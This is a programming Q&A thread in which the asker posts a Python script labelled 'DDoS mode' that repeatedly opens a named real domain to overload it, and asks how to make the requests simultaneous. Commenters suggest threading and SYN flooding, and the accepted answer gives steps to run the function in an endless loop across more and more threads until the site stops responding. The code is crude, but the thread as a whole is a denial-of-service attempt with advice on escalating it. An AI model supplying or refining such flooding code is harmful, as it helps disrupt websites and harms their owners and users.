# Is it possible to open a webpage 200 times at the same time?

Tags: python, browser

I am trying with python attack my webserver.

Is it possible to open somehow the webpage lots of times in a same time? How can I do it? Maybe with using threads? Any idea?

```
import time, socket, os, sys, string, webbrowser, thread

def restart_program():
    python = sys.executable
    os.execl(python, python, * sys.argv)
curdir = os.getcwd()

print ("DDoS mode loaded")
host="hajnalgroup.com"
port= 80
message="+---------------------------+"
conn= 200
ip = socket.gethostbyname(host)
print ("[" + ip + "]")
print ( "[Attacking " + host + "]" )
def dos():
    #pid = os.fork()
    ddos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        webbrowser.open('http://hajnalgroup.com')
        #thread.start_new_thread(webbrowser.open("hajnalgroup.com"))
    except socket.error:
        print("connection failed")
    print i, ( "attack just started")
    ddos.close()
for i in range(0, conn):
    dos()
print("The connections you requested had finished")
if __name__ == "__main__":
    answer = raw_input("Do you want to ddos more?")
    if answer.strip() in "y Y yes Yes YES".split():
        restart_program()
    else:
        print "bye"
```

Comment: What happened when you tried it?

Comment: Yes you can use [threads](http://www.tutorialspoint.com/python/python_multithreading.htm) for this.

Comment: just opened the page 200 times one after the other. not in a same time :(

Comment: HTTP is a stateless protocol, so a web page is never "open" or "closed". Hence it is enough to fire the HTTP-request in short sequence, as your NIC will have to send them sequentially no matter what. You call it "DDoS" in your program. DDoS from a single host won't work. Also I wouldn't go for HTTP, but maybe syn-ack-flooding or the like.

Answer (score 2, accepted):

I'd do the following:

1. Put a `while true:` in your function
2. Copy your function definition to a python interpreter
3. `import thread`
4. `thread.start_new_thread(ddos, ())`
5. See if your webpage is alive. If yes, repeat point 4. until it isn't.

This way you'll get the rough image of how powerful your server is.

Comment: Why the downvote? It might not be the cleanest way to do this, but a simple and a fun one (imo).

Comment: oh, sorry then. I probably have a naive vision of how ddoses work :/

Comment: It is not ddos, just dos attack)(read wiki to see the difference) But i like your approach and that is why +1.